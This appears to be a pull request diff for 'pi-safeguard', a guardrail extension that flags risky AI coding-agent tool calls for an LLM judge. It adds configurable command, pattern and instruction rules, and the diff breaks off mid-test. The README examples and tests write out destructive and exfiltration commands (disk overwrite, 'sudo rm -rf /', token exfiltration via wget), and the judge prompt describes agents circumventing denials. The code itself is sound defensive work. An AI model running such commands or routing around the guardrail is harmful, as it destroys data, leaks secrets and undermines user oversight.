### PR TITLE
safeguard: configurable commands, patterns, instructions + project-level config

### DIFF
--- a/.changeset/safeguard-config-redesign.md
+++ b/.changeset/safeguard-config-redesign.md
@@ -1,0 +1,9 @@
+---
+"pi-safeguard": minor
+---
+
+Add user-configurable `commands`, `patterns`, and `instructions` fields to safeguard config. Commands support flat string (flag any invocation) and subcommand prefix arrays (`["gh", "repo", "delete"]`). Patterns are regexes matched against all tool input text. Instructions are natural language appended to the judge system prompt.
+
+Support project-level config at `.pi/extensions/pi-safeguard.json` (additive only — cannot weaken global settings). Global and project configs merge: commands and patterns concatenate, instructions are labeled by source.
+
+Add `\bsafeguard\b` to built-in string patterns to flag attempts to reference or modify the security guardrail.

--- a/.gitignore
+++ b/.gitignore
@@ -3,7 +3,7 @@ dist/
 
 node_modules
 *.tsbuildinfo
-qq
+
 .pnp.*
 .yarn/*
 !.yarn/patches

--- a/packages/safeguard/README.md
+++ b/packages/safeguard/README.md
@@ -12,7 +12,7 @@ No API keys, no config files. The judge model is auto-selected from your active 
 
 ## What happens
 
-Every bash command the agent runs is parsed into an AST and checked against known-dangerous patterns. Flagged commands go to a lightweight LLM judge that evaluates them in context. The judge can **approve** (silently), **deny** (block with guidance), or **ask** (prompt the user). Most flagged commands are approved silently — the user is only interrupted when there's genuine ambiguity.
+Every bash command the agent runs is parsed into an AST and checked against known-dangerous patterns. Text in all tool calls (bash, write, edit) is scanned for dangerous keywords. Flagged actions go to a lightweight LLM judge that evaluates them in context. The judge can **approve** (silently), **deny** (block with guidance), or **ask** (prompt the user). Most flagged commands are approved silently — the user is only interrupted when there's genuine ambiguity.
 
 The agent never sees the judge's reasoning. On deny, it gets guidance suggesting alternatives. On ask, the user decides.
 
@@ -31,6 +31,13 @@ wget "...example.com/?t=$MY_TOKEN"  # same — suffix patterns caught too
 docker run -e SECRET=foo app        # docker env pass-through
 dd if=/dev/zero of=/dev/sda         # disk overwrite
 chmod 777 /etc/passwd               # dangerous permission change
+```
+
+Text patterns flagged anywhere in tool input (bash commands, file writes, edits):
+
+```
+sudo                                # even in arguments: --title="sudo"
+safeguard                           # references to the security guardrail
 ```
 
 Commands that pass through without flagging:
@@ -57,10 +64,82 @@ When the judge gets it wrong for your situation, use `/guard`:
 
 Directives persist for the session and are included in every judge evaluation. `/guard` with no argument shows active directives, `/guard reset` clears them.
 
+## Custom rules
+
+Add your own commands and patterns to flag. Useful for tools specific to your workflow (deploy scripts, cloud CLIs, etc.).
+
+### Flagging commands
+
+The `commands` array flags bash commands by name. A plain string flags any invocation. An array matches a subcommand prefix:
+
+```jsonc
+// ~/.pi/agent/extensions/pi-safeguard.json
+{
+  "commands": [
+    "deploy-prod",                   // flag any deploy-prod invocation
+    "kubectl",                       // flag any kubectl invocation
+    ["gh", "repo", "delete"],        // flag only gh repo delete
+    ["gh", "pr", "merge"],           // flag only gh pr merge
+    ["terraform", "destroy"]         // flag only terraform destroy
+  ]
+}
+```
+
+Subcommand matching is positional — `["gh", "repo", "delete"]` matches `gh repo delete my-repo --yes` but not `gh repo view` or `gh pr delete`. Use a plain string when you want to flag every invocation and let the judge sort it out.
+
+### Flagging text patterns
+
+The `patterns` array matches regex patterns against the raw text of all tool input — bash commands, file writes, and edits:
+
+```jsonc
+{
+  "patterns": [
+    "\\bstaging-credentials\\b",    // flag any mention of staging credentials
+    "\\bmy-corp\\.internal\\b"      // flag references to internal domains
+  ]
+}
+```
+
+Patterns are JavaScript regular expressions. Use `\\b` for word boundaries (doubled backslash in JSON).
+
+### Judge instructions
+
+The `instructions` field adds natural language context to the judge's system prompt. Use it for nuanced rules that don't reduce to a command name or regex:
+
+```jsonc
+{
+  "instructions": "I work with Docker daily. Routine commands (build, run, ps, logs) are safe. Flag --privileged or host filesystem mounts. terraform plan is always safe; terraform apply needs review."
+}
+```
+
+## Project-level configuration
+
+Per-project rules live at `.pi/extensions/pi-safeguard.json` in the project root. They use the same format but are **additive only** — they can add commands, patterns, and instructions, but cannot disable safeguard or change operational settings.
+
+```jsonc
+// .pi/extensions/pi-safeguard.json
+{
+  "commands": [["terraform", "destroy"]],
+  "patterns": ["\\bstaging-db\\b"],
+  "instructions": "This project manages production infrastructure. Be extra careful with any state-changing operations."
+}
+```
+
+Project config merges with global config: commands and patterns concatenate, instructions are both included in the judge prompt (labeled by source). Operational settings (`enabled`, `judgeModel`, `judgeTimeoutMs`) are global-only.
+
+### Config hierarchy
+
+| Scope | Location | Can weaken defaults? |
+|-------|----------|---------------------|
+| Built-in | Package source | — |
+| Global | `~/.pi/agent/extensions/pi-safeguard.json` | Yes (your machine) |
+| Project | `.pi/extensions/pi-safeguard.json` | No — additive only |
+| Session | `/guard` trust directives | Yes (ephemeral) |
+
 ## How it works
 
 ```
-bash command → AST parse → pattern match → LLM judge → approve / deny / ask
+tool call → AST parse (bash) + text scan → pattern match → LLM judge → approve / deny / ask
 ```
 
 Commands are parsed with a full shell parser ([@aliou/sh](https://github.com/aliou/sh)), not regex. This means:
@@ -70,6 +149,8 @@ Commands are parsed with a full shell parser ([@aliou/sh](https://github.com/ali
 - **Variable expansion tracking** — `curl "$API_KEY"` caught because the parser sees `ParamExp` nodes, not string content
 - **No substring false positives** — `environment` in a path won't trigger the `env` check
 
+Text scanning catches dangerous keywords even when they appear outside bash command names — in arguments, file content being written, or edit replacements. This catches social engineering attempts like `zenity --title="sudo"` that AST-level command matching would miss.
+
 After a denial, the next relevant tool call always goes to the judge regardless of pattern matching — this catches agents retrying the same goal via different commands.
 
 ### Limitations
@@ -78,12 +159,15 @@ No static analysis can catch runtime evasion: `eval "cat .env"`, `bash -c "cat .
 
 **Threat model**: pi-safeguard protects against accidents and overeager agents, not adversarial jailbreaks. If an attacker controls the agent's prompt, you need OS-level sandboxing, not extension-level guardrails.
 
-## Configuration
+## Configuration reference
 
 No configuration needed — the defaults work out of the box. To customize, create `~/.pi/agent/extensions/pi-safeguard.json`:
 
-```json
+```jsonc
 {
+  "commands": ["kubectl", ["gh", "repo", "delete"]],
+  "patterns": ["\\bmy-secret\\b"],
+  "instructions": "Be strict about cloud operations.",
   "judgeModel": {
     "modelOverride": "anthropic/claude-haiku-4-5"
   },
@@ -96,6 +180,9 @@ All fields are optional. Omit the file entirely to use defaults.
 | Option | Default | Description |
 |--------|---------|-------------|
 | `enabled` | `true` | Kill switch — `false` disables all hooks |
+| `commands` | `[]` | Command names or subcommand prefixes to flag |
+| `patterns` | `[]` | Regex patterns to flag in all tool input text |
+| `instructions` | — | Natural language context for the judge |
 | `judgeTimeoutMs` | `10000` | Judge timeout in ms (1,000–60,000). On timeout, falls back to asking the user — never silently approved. |
 | `judgeModel` | *(auto-select)* | Judge model selection — see below |
 

--- a/packages/safeguard/src/config.ts
+++ b/packages/safeguard/src/config.ts
@@ -4,44 +4,134 @@ import { BudgetModelOptions as BudgetModelOptionsSchema } from "pi-budget-model"
 import type { BudgetModelOptions } from "pi-budget-model";
 import * as v from "valibot";
 
-// --- Safeguard configuration schema ---
+// --- Safeguard configuration schemas ---
 
+/** A command matcher: either a command name or [command, ...subcommands] prefix. */
+const CommandMatcher = v.union([v.string(), v.pipe(v.array(v.string()), v.minLength(1))]);
+export type CommandMatcher = v.InferOutput<typeof CommandMatcher>;
+
+/** Fields shared between global and project config — additive, merged across layers. */
+const SharedConfig = v.object({
+	/** Command names to flag. String = any invocation; array = subcommand prefix match. */
+	commands: v.optional(v.array(CommandMatcher), []),
+	/** Regex patterns to flag anywhere in tool input text. */
+	patterns: v.optional(v.array(v.string()), []),
+	/** Natural language instructions appended to the judge system prompt. */
+	instructions: v.optional(v.string()),
+});
+
+/** Global config: shared fields + operational settings. */
 export const SafeguardConfig = v.object({
-	/** Disable safeguard entirely */
+	...SharedConfig.entries,
+	/** Disable safeguard entirely (global only) */
 	enabled: v.optional(v.boolean(), true),
-	/** Judge model selection — embeds pi-budget-model options as-is */
+	/** Judge model selection (global only) */
 	judgeModel: v.optional(BudgetModelOptionsSchema, {}),
-	/** Judge call timeout in ms */
+	/** Judge call timeout in ms (global only) */
 	judgeTimeoutMs: v.optional(v.pipe(v.number(), v.minValue(1000), v.maxValue(60_000)), 10_000),
 });
 export type SafeguardConfig = v.InferOutput<typeof SafeguardConfig>;
 
-/** Config file location: ~/.pi/agent/extensions/pi-safeguard.json */
-function configPath(): string {
+/** Project config: shared fields only — cannot weaken operational settings. */
+export const ProjectConfig = SharedConfig;
+export type ProjectConfig = v.InferOutput<typeof ProjectConfig>;
+
+/** Merged config used at runtime. */
+export interface MergedConfig {
+	enabled: boolean;
+	judgeModel: BudgetModelOptions;
+	judgeTimeoutMs: number;
+	commands: CommandMatcher[];
+	patterns: RegExp[];
+	globalInstructions?: string;
+	projectInstructions?: string;
+}
+
+// --- Config file paths ---
+
+function globalConfigPath(): string {
 	return join(process.env.HOME ?? "~", ".pi", "agent", "extensions", "pi-safeguard.json");
 }
 
-/** Load and validate config from disk. Returns defaults if file doesn't exist. */
-export function loadSafeguardConfig(): SafeguardConfig {
-	const path = configPath();
-	let raw: unknown = {};
+function projectConfigPath(cwd: string): string {
+	return join(cwd, ".pi", "extensions", "pi-safeguard.json");
+}
+
+// --- Config loading ---
+
+function readJsonFile(path: string, label: string): unknown | undefined {
 	try {
-		raw = JSON.parse(readFileSync(path, "utf-8"));
+		return JSON.parse(readFileSync(path, "utf-8"));
 	} catch (err) {
-		// File doesn't exist or is unreadable — use defaults
-		if ((err as NodeJS.ErrnoException).code !== "ENOENT") {
-			throw new Error(`safeguard: failed to read config at ${path}: ${err instanceof Error ? err.message : err}`);
-		}
-	}
-	try {
-		return v.parse(SafeguardConfig, raw);
-	} catch (err) {
-		throw new Error(`safeguard: invalid config at ${path}: ${err instanceof Error ? err.message : err}`);
+		if ((err as NodeJS.ErrnoException).code === "ENOENT") return undefined;
+		throw new Error(
+			`safeguard: failed to read ${label} config at ${path}: ${err instanceof Error ? err.message : err}`,
+		);
 	}
 }
 
-/** Extract BudgetModelOptions from the safeguard config. */
-export function toBudgetModelOptions(config: SafeguardConfig): BudgetModelOptions {
+function parseConfig<T>(schema: v.GenericSchema<unknown, T>, raw: unknown, path: string, label: string): T {
+	try {
+		return v.parse(schema, raw);
+	} catch (err) {
+		throw new Error(`safeguard: invalid ${label} config at ${path}: ${err instanceof Error ? err.message : err}`);
+	}
+}
+
+/** Compile user-provided regex strings into RegExp objects. Throws on invalid regex. */
+function compilePatterns(patterns: string[], label: string): RegExp[] {
+	return patterns.map((p) => {
+		try {
+			return new RegExp(p);
+		} catch (err) {
+			throw new Error(
+				`safeguard: invalid regex in ${label} patterns: "${p}" — ${err instanceof Error ? err.message : err}`,
+			);
+		}
+	});
+}
+
+/** Load global config. Returns defaults if file doesn't exist. */
+export function loadGlobalConfig(): SafeguardConfig {
+	const path = globalConfigPath();
+	const raw = readJsonFile(path, "global") ?? {};
+	return parseConfig(SafeguardConfig, raw, path, "global");
+}
+
+/** Load project config from cwd. Returns undefined if file doesn't exist. */
+export function loadProjectConfig(cwd: string): ProjectConfig | undefined {
+	const path = projectConfigPath(cwd);
+	const raw = readJsonFile(path, "project");
+	if (raw === undefined) return undefined;
+	return parseConfig(ProjectConfig, raw, path, "project");
+}
+
+/** Load and merge global + project config into a single runtime config. */
+export function loadMergedConfig(cwd: string): MergedConfig {
+	const global = loadGlobalConfig();
+	const project = loadProjectConfig(cwd);
+
+	const commands = [...global.commands];
+	const patternStrs = [...global.patterns];
+
+	if (project) {
+		commands.push(...project.commands);
+		patternStrs.push(...project.patterns);
+	}
+
+	return {
+		enabled: global.enabled,
+		judgeModel: global.judgeModel,
+		judgeTimeoutMs: global.judgeTimeoutMs,
+		commands,
+		patterns: compilePatterns(patternStrs, project ? "global+project" : "global"),
+		globalInstructions: global.instructions,
+		projectInstructions: project?.instructions,
+	};
+}
+
+/** Extract BudgetModelOptions from the merged config. */
+export function toBudgetModelOptions(config: MergedConfig): BudgetModelOptions {
 	return config.judgeModel;
 }
 
@@ -59,7 +149,7 @@ export const BASH_DETAIL_LEN = 50;
 export const DEFAULT_DENY_GUIDANCE =
 	"This action was blocked by the security guardrail. Consider a different approach, ask the user to run the command directly, or ask the user to grant access with /guard.";
 
-export const SYSTEM_PROMPT = `You are a security guardrail for an AI coding agent. You evaluate actions that were flagged by automatic pattern matching.
+const BASE_SYSTEM_PROMPT = `You are a security guardrail for an AI coding agent. You evaluate actions that were flagged by automatic pattern matching.
 
 Your job: decide if the action is safe to proceed WITHOUT interrupting the user.
 
@@ -87,3 +177,17 @@ Circumvention detection:
 If a previous action was denied and the agent is now attempting the same goal via different commands (e.g. denied "cat .env", now trying "head .env" or "grep . .env"), respond with "ask" to let the user decide. Note: solving the problem differently and safely (e.g. asking the user to provide a value, using a different approach entirely) is NOT circumvention.
 
 Be pragmatic. Developers work with these files and commands constantly. Err toward approve for typical dev workflows.`;
+
+/** Build the full judge system prompt with optional user/project instructions. */
+export function buildSystemPrompt(config: MergedConfig): string {
+	const parts = [BASE_SYSTEM_PROMPT];
+
+	if (config.globalInstructions) {
+		parts.push(`\n\nUser instructions (global):\n${config.globalInstructions}`);
+	}
+	if (config.projectInstructions) {
+		parts.push(`\n\nProject instructions:\n${config.projectInstructions}`);
+	}
+
+	return parts.join("");
+}

--- a/packages/safeguard/src/index.ts
+++ b/packages/safeguard/src/index.ts
@@ -10,7 +10,9 @@
  * When no budget model is available (e.g. user is already on the cheapest model),
  * falls back to "ask" mode — every flagged action prompts the user directly.
  *
- * Configuration: ~/.pi/agent/extensions/pi-safeguard.json
+ * Configuration:
+ *   Global:  ~/.pi/agent/extensions/pi-safeguard.json
+ *   Project: .pi/extensions/pi-safeguard.json (additive only)
  *
  * The agent never sees the judge's reasoning. On deny/ask it receives guidance
  * suggesting alternative approaches. Previous verdicts are stored in the
@@ -24,10 +26,11 @@ import type { ExtensionAPI, ExtensionContext } from "@mariozechner/pi-coding-age
 import { type BudgetModel, findBudgetModel } from "pi-budget-model";
 import {
 	DEFAULT_DENY_GUIDANCE,
-	type SafeguardConfig,
+	type MergedConfig,
 	TRUST_ENTRY_TYPE,
 	VERDICT_ENTRY_TYPE,
-	loadSafeguardConfig,
+	buildSystemPrompt,
+	loadMergedConfig,
 	toBudgetModelOptions,
 } from "./config.js";
 import { buildContext, getTrustDirectives } from "./context.js";
@@ -36,9 +39,13 @@ import { describeAction, isRelevantTool, matchPatterns } from "./patterns.js";
 import type { VerdictData } from "./types.js";
 
 export default function (pi: ExtensionAPI) {
-	const config = loadSafeguardConfig();
+	// Config is loaded once at startup using process.cwd() for project config.
+	// A new pi session is needed to pick up config changes.
+	const config = loadMergedConfig(process.cwd());
 
 	if (!config.enabled) return;
+
+	const systemPrompt = buildSystemPrompt(config);
 
 	pi.registerCommand("guard", {
 		description: "Manage safeguard: /guard <trust directive> or /guard reset",
@@ -74,7 +81,7 @@ export default function (pi: ExtensionAPI) {
 		let action: string | undefined;
 		let postDenialCheck = false;
 
-		action = matchPatterns(event);
+		action = matchPatterns(event, config);
 
 		if (!action && needsPostDenialCheck && isRelevantTool(event)) {
 			action = describeAction(event);
@@ -82,7 +89,7 @@ export default function (pi: ExtensionAPI) {
 		}
 
 		if (!action) return;
-		const result = await evaluate(pi, ctx, config, action, postDenialCheck);
+		const result = await evaluate(pi, ctx, config, systemPrompt, action, postDenialCheck);
 		if (postDenialCheck) {
 			// One check done — clear regardless of outcome
 			needsPostDenialCheck = false;
@@ -99,7 +106,8 @@ export default function (pi: ExtensionAPI) {
 async function evaluate(
 	pi: ExtensionAPI,
 	ctx: ExtensionContext,
-	config: SafeguardConfig,
+	config: MergedConfig,
+	systemPrompt: string,
 	action: string,
 	postDenialCheck: boolean,
 ): Promise<{ block: true; reason: string } | undefined> {
@@ -122,6 +130,7 @@ async function evaluate(
 			recentContext,
 			trustDirectives,
 			config.judgeTimeoutMs,
+			systemPrompt,
 		);
 
 		if (verdict.verdict === "approve") {
@@ -150,7 +159,7 @@ async function evaluate(
 
 // --- Judge model resolution ---
 
-async function resolveJudgeModel(ctx: ExtensionContext, config: SafeguardConfig): Promise<BudgetModel> {
+async function resolveJudgeModel(ctx: ExtensionContext, config: MergedConfig): Promise<BudgetModel> {
 	return findBudgetModel(ctx, toBudgetModelOptions(config));
 }
 

--- a/packages/safeguard/src/judge.ts
+++ b/packages/safeguard/src/judge.ts
@@ -1,6 +1,5 @@
 import { completeSimple } from "@mariozechner/pi-ai";
 import type { Api, Model } from "@mariozechner/pi-ai";
-import { SYSTEM_PROMPT } from "./config.js";
 import type { Verdict } from "./types.js";
 
 export function parseVerdict(text: string): Verdict {
@@ -24,6 +23,7 @@ export async function callJudge(
 	recentContext: string,
 	trustDirectives: string[],
 	timeoutMs: number,
+	systemPrompt: string,
 ): Promise<Verdict> {
 	const parts = [`Action: ${action}`, `Working directory: ${cwd}`];
 	if (trustDirectives.length > 0) {
@@ -40,7 +40,7 @@ export async function callJudge(
 		const response = await completeSimple(
 			model,
 			{
-				systemPrompt: SYSTEM_PROMPT,
+				systemPrompt,
 				messages: [{ role: "user", content: parts.join("\n"), timestamp: Date.now() }],
 			},
 			{

--- a/packages/safeguard/src/patterns.ts
+++ b/packages/safeguard/src/patterns.ts
@@ -2,6 +2,7 @@ import * as path from "node:path";
 import type { ToolCallEvent } from "@mariozechner/pi-coding-agent";
 import { isToolCallEventType } from "@mariozechner/pi-coding-agent";
 import { type BashAnalysis, analyzeBashCommand } from "./ast.js";
+import type { CommandMatcher, MergedConfig } from "./config.js";
 
 // --- String patterns ---
 
@@ -13,17 +14,23 @@ interface StringPattern {
 	reason: string;
 }
 
-const STRING_PATTERNS: StringPattern[] = [
+const BUILTIN_STRING_PATTERNS: StringPattern[] = [
 	{ pattern: /\bsudo\b/, reason: "sudo: superuser command" },
+	{ pattern: /\bsafeguard\b/, reason: "safeguard: references security guardrail" },
 ];
 
 /**
- * Check raw text content against string patterns.
+ * Check raw text content against built-in and user-configured string patterns.
  * Returns the reason from the first matching pattern, or undefined.
  */
-export function matchStringPatterns(text: string): string | undefined {
-	for (const { pattern, reason } of STRING_PATTERNS) {
+export function matchStringPatterns(text: string, userPatterns?: RegExp[]): string | undefined {
+	for (const { pattern, reason } of BUILTIN_STRING_PATTERNS) {
 		if (pattern.test(text)) return reason;
+	}
+	if (userPatterns) {
+		for (const pattern of userPatterns) {
+			if (pattern.test(text)) return `pattern: ${pattern.source}`;
+		}
 	}
 	return undefined;
 }
@@ -37,6 +44,35 @@ function extractToolText(event: ToolCallEvent): string {
 	if (isToolCallEventType("write", event)) return event.input.content;
 	if (isToolCallEventType("edit", event)) return event.input.newText;
 	return "";
+}
+
+// --- User command matching ---
+
+/**
+ * Check if a bash command matches any user-configured command matchers.
+ * String matchers match the command name. Array matchers match a subcommand prefix.
+ */
+export function matchUserCommands(analysis: BashAnalysis, matchers: CommandMatcher[]): string | undefined {
+	if (matchers.length === 0) return undefined;
+
+	for (const cmd of analysis.commands) {
+		for (const matcher of matchers) {
+			if (typeof matcher === "string") {
+				if (cmd.name === matcher) return `${matcher}: flagged command`;
+			} else {
+				// Array: match subcommand prefix [command, sub1, sub2, ...]
+				if (cmd.name !== matcher[0]) continue;
+				const prefix = matcher.slice(1);
+				if (prefix.length === 0) {
+					return `${matcher[0]}: flagged command`;
+				}
+				if (prefix.every((sub, i) => cmd.args[i] === sub)) {
+					return `${matcher.join(" ")}: flagged command`;
+				}
+			}
+		}
+	}
+	return undefined;
 }
 
 // --- File patterns ---
@@ -91,10 +127,10 @@ function hasSecretParamRefs(analysis: BashAnalysis): boolean {
 }
 
 /**
- * Classify a bash command using AST analysis.
+ * Classify a bash command using built-in AST analysis and user command matchers.
  * Returns a description of why it was flagged, or undefined if safe.
  */
-export function classifyBashCommand(cmd: string): string | undefined {
+export function classifyBashCommand(cmd: string, userCommands?: CommandMatcher[]): string | undefined {
 	const analysis = analyzeBashCommand(cmd);
 
 	// Unparseable command = suspicious. Agents almost never produce invalid syntax,
@@ -157,6 +193,12 @@ export function classifyBashCommand(cmd: string): string | undefined {
 		}
 	}
 
+	// --- User-configured command matchers ---
+	if (userCommands) {
+		const userMatch = matchUserCommands(analysis, userCommands);
+		if (userMatch) return userMatch;
+	}
+
 	// --- Cross-command patterns (pipelines, etc.) ---
 
 	// Exfiltration: env file → network command in pipeline
@@ -187,12 +229,12 @@ function hasFlags(args: string[], ...flags: string[]): boolean {
 	});
 }
 
-// --- Tool event interface (unchanged public API) ---
+// --- Tool event interface ---
 
 /** Check if a tool call should be flagged. Returns a reason string or undefined. */
-export function matchPatterns(event: ToolCallEvent): string | undefined {
+export function matchPatterns(event: ToolCallEvent, config?: MergedConfig): string | undefined {
 	if (isToolCallEventType("bash", event)) {
-		const reason = classifyBashCommand(event.input.command);
+		const reason = classifyBashCommand(event.input.command, config?.commands);
 		if (reason) return `bash: ${event.input.command} [${reason}]`;
 	}
 
@@ -205,7 +247,7 @@ export function matchPatterns(event: ToolCallEvent): string | undefined {
 	// Checked after AST so we don't double-flag bash commands that the AST already caught.
 	const text = extractToolText(event);
 	if (text) {
-		const reason = matchStringPatterns(text);
+		const reason = matchStringPatterns(text, config?.patterns);
 		if (reason) return `${describeAction(event)} [${reason}]`;
 	}
 

--- a/packages/safeguard/test/config.test.ts
+++ b/packages/safeguard/test/config.test.ts
@@ -1,0 +1,112 @@
+import * as v from "valibot";
+import { describe, expect, it } from "vitest";
+import { ProjectConfig, SafeguardConfig, buildSystemPrompt } from "../src/config.js";
+import type { MergedConfig } from "../src/config.js";
+
+describe("SafeguardConfig schema", () => {
+	it("parses empty object with defaults", () => {
+		const result = v.parse(SafeguardConfig, {});
+		expect(result.enabled).toBe(true);
+		expect(result.commands).toEqual([]);
+		expect(result.patterns).toEqual([]);
+		expect(result.instructions).toBeUndefined();
+		expect(result.judgeTimeoutMs).toBe(10_000);
+	});
+
+	it("parses full config", () => {
+		const result = v.parse(SafeguardConfig, {
+			enabled: false,
+			commands: ["kubectl", ["gh", "repo", "delete"]],
+			patterns: ["\\bmy-secret\\b"],
+			instructions: "Be strict about terraform",
+			judgeTimeoutMs: 5000,
+		});
+		expect(result.enabled).toBe(false);
+		expect(result.commands).toEqual(["kubectl", ["gh", "repo", "delete"]]);
+		expect(result.patterns).toEqual(["\\bmy-secret\\b"]);
+		expect(result.instructions).toBe("Be strict about terraform");
+	});
+
+	it("rejects empty array command matcher", () => {
+		expect(() => v.parse(SafeguardConfig, { commands: [[]] })).toThrow();
+	});
+
+	it("rejects invalid judgeTimeoutMs", () => {
+		expect(() => v.parse(SafeguardConfig, { judgeTimeoutMs: 100 })).toThrow();
+	});
+});
+
+describe("ProjectConfig schema", () => {
+	it("parses shared fields only", () => {
+		const result = v.parse(ProjectConfig, {
+			commands: [["terraform", "destroy"]],
+			patterns: ["\\bstaging\\b"],
+			instructions: "This project uses terraform",
+		});
+		expect(result.commands).toEqual([["terraform", "destroy"]]);
+		expect(result.patterns).toEqual(["\\bstaging\\b"]);
+		expect(result.instructions).toBe("This project uses terraform");
+	});
+
+	it("rejects operational fields", () => {
+		// ProjectConfig uses v.object with only shared fields, so extra keys
+		// are stripped by valibot's default behavior (not rejected).
+		// The important thing is they don't appear in the output.
+		const result = v.parse(ProjectConfig, {
+			enabled: false,
+			judgeTimeoutMs: 5000,
+			commands: [],
+		});
+		expect(result).not.toHaveProperty("enabled");
+		expect(result).not.toHaveProperty("judgeTimeoutMs");
+	});
+});
+
+describe("buildSystemPrompt", () => {
+	const baseConfig: MergedConfig = {
+		enabled: true,
+		judgeModel: {},
+		judgeTimeoutMs: 10000,
+		commands: [],
+		patterns: [],
+	};
+
+	it("returns base prompt without instructions", () => {
+		const prompt = buildSystemPrompt(baseConfig);
+		expect(prompt).toContain("security guardrail");
+		expect(prompt).not.toContain("User instructions");
+		expect(prompt).not.toContain("Project instructions");
+	});
+
+	it("appends global instructions", () => {
+		const prompt = buildSystemPrompt({
+			...baseConfig,
+			globalInstructions: "Be strict about docker",
+		});
+		expect(prompt).toContain("User instructions (global):");
+		expect(prompt).toContain("Be strict about docker");
+	});
+
+	it("appends project instructions", () => {
+		const prompt = buildSystemPrompt({
+			...baseConfig,
+			projectInstructions: "This project uses terraform",
+		});
+		expect(prompt).toContain("Project instructions:");
+		expect(prompt).toContain("This project uses terraform");
+	});
+
+	it("includes both global and project instructions", () => {
+		const prompt = buildSystemPrompt({
+			...baseConfig,
+			globalInstructions: "Global rule",
+			projectInstructions: "Project rule",
+		});
+		expect(prompt).toContain("User instructions (global):");
+		expect(prompt).toContain("Global rule");
+		expect(prompt).toContain("Project instructions:");
+		expect(prompt).toContain("Project rule");
+		// Global should come before project
+		expect(prompt.indexOf("Global rule")).toBeLessThan(prompt.indexOf("Project rule"));
+	});
+});

--- a/packages/safeguard/test/patterns.test.ts
+++ b/packages/safeguard/test/patterns.test.ts
@@ -1,8 +1,10 @@
 import { describe, expect, it } from "vitest";
-import { classifyBashCommand, isEnvFile, matchStringPatterns } from "../src/patterns.js";
+import { analyzeBashCommand } from "../src/ast.js";
+import type { CommandMatcher } from "../src/config.js";
+import { classifyBashCommand, isEnvFile, matchStringPatterns, matchUserCommands } from "../src/patterns.js";
 
 describe("matchStringPatterns", () => {
-	describe("sudo", () => {
+	describe("sudo (built-in)", () => {
 		it("flags 'sudo' as a standalone word", () => {
 			expect(matchStringPatterns("sudo apt install foo")).toContain("sudo");
 		});
@@ -10,7 +12,7 @@ describe("matchStringPatterns", () => {
 			expect(matchStringPatterns("run sudo to install")).toContain("sudo");
 		});
 		it("flags 'sudo' quoted", () => {
-			expect(matchStringPatterns("run \"sudo\" to install")).toContain("sudo");
+			expect(matchStringPatterns('run "sudo" to install')).toContain("sudo");
 		});
 		it("flags 'sudo' at end of string", () => {
 			expect(matchStringPatterns("please use sudo")).toContain("sudo");
@@ -24,6 +26,95 @@ describe("matchStringPatterns", () => {
 		it("flags sudo in a multiline script", () => {
 			const script = "#!/bin/bash\necho hello\nsudo rm -rf /\necho done";
 			expect(matchStringPatterns(script)).toContain("sudo");
+		});
+	});
+
+	describe("safeguard (built-in)", () => {
+		it("flags 'safeguard' as a standalone word", () => {
+			expect(matchStringPatterns("disable safeguard checks")).toContain("safeguard");
+		});
+		it("does not flag 'safeguarding'", () => {
+			// \bsafeguard\b requires word boundary after 'd', so 'safeguarding' doesn't match
+			expect(matchStringPatterns("safeguarding the system")).toBeUndefined();
+		});
+	});
+
+	describe("user patterns", () => {
+		it("matches user regex patterns", () => {
+			const userPatterns = [/\bkubectl\b/];
+			expect(matchStringPatterns("running kubectl apply", userPatterns)).toContain("kubectl");
+		});
+		it("built-in patterns take precedence", () => {
+			const userPatterns = [/\bsudo\b/];
+			const result = matchStringPatterns("sudo rm -rf", userPatterns);
+			// Built-in sudo pattern fires first
+			expect(result).toContain("sudo: superuser command");
+		});
+		it("returns undefined when no patterns match", () => {
+			const userPatterns = [/\bkubectl\b/];
+			expect(matchStringPatterns("echo hello", userPatterns)).toBeUndefined();
+		});
+		it("labels user pattern matches with source regex", () => {
+			const userPatterns = [/\bmy-secret\b/];
+			const result = matchStringPatterns("contains my-secret here", userPatterns);
+			expect(result).toBe("pattern: \\bmy-secret\\b");
+		});
+	});
+});
+
+describe("matchUserCommands", () => {
+	describe("string matchers (command name)", () => {
+		it("matches a simple command name", () => {
+			const analysis = analyzeBashCommand("kubectl get pods");
+			expect(matchUserCommands(analysis, ["kubectl"])).toContain("kubectl");
+		});
+		it("does not match a different command", () => {
+			const analysis = analyzeBashCommand("ls -la");
+			expect(matchUserCommands(analysis, ["kubectl"])).toBeUndefined();
+		});
+		it("matches command in a pipeline", () => {
+			const analysis = analyzeBashCommand("echo y | terraform apply");
+			expect(matchUserCommands(analysis, ["terraform"])).toContain("terraform");
+		});
+	});
+
+	describe("array matchers (subcommand prefix)", () => {
+		it("matches exact subcommand prefix", () => {
+			const analysis = analyzeBashCommand("gh repo delete my-repo");
+			expect(matchUserCommands(analysis, [["gh", "repo", "delete"]])).toContain("gh repo delete");
+		});
+		it("does not match partial prefix", () => {
+			const analysis = analyzeBashCommand("gh repo view my-repo");
+			expect(matchUserCommands(analysis, [["gh", "repo", "delete"]])).toBeUndefined();
+		});
+		it("matches shorter prefix", () => {
+			const analysis = analyzeBashCommand("gh repo delete my-repo --yes");
+			expect(matchUserCommands(analysis, [["gh", "repo"]])).toContain("gh repo");
+		});
+		it("single-element array matches like a string", () => {
+			const analysis = analyzeBashCommand("kubectl get pods");
+			expect(matchUserCommands(analysis, [["kubectl"]])).toContain("kubectl");
+		});
+		it("does not match when subcommand differs", () => {
+			const analysis = analyzeBashCommand("gh pr view 123");
+			expect(matchUserCommands(analysis, [["gh", "repo"]])).toBeUndefined();
+		});
+	});
+
+	describe("mixed matchers", () => {
+		it("matches any matcher in the list", () => {
+			const analysis = analyzeBashCommand("terraform destroy");
+			const matchers: CommandMatcher[] = ["kubectl", ["terraform", "destroy"], ["gh", "repo", "delete"]];
+			expect(matchUserCommands(analysis, matchers)).toContain("terraform destroy");
+		});
+		it("returns undefined when nothing matches", () => {
+			const analysis = analyzeBashCommand("echo hello");
+			const matchers: CommandMatcher[] = ["kubectl", ["gh", "repo", "delete"]];
+			expect(matchUserCommands(analysis, matchers)).toBeUndefined();
+		});
+		it("returns empty for no matchers", () => {
+			const analysis = analyzeBashCommand("kubectl get pods");
+			expect(matchUserCommands(analysis, [])).toBeUndefined();
 		});
 	});
 });
@@ -119,6 +210,26 @@ describe("classifyBashCommand", () => {
 
 		it("ignores curl without variable refs", () => {
 			expect(classifyBashCommand("curl http://example.com")).toBeUndefined();
+		});
+	});
+
+	describe("user command matchers", () => {
+		it("flags user-configured command name", () => {
+			const r = classifyBashCommand("kubectl get pods", ["kubectl"]);
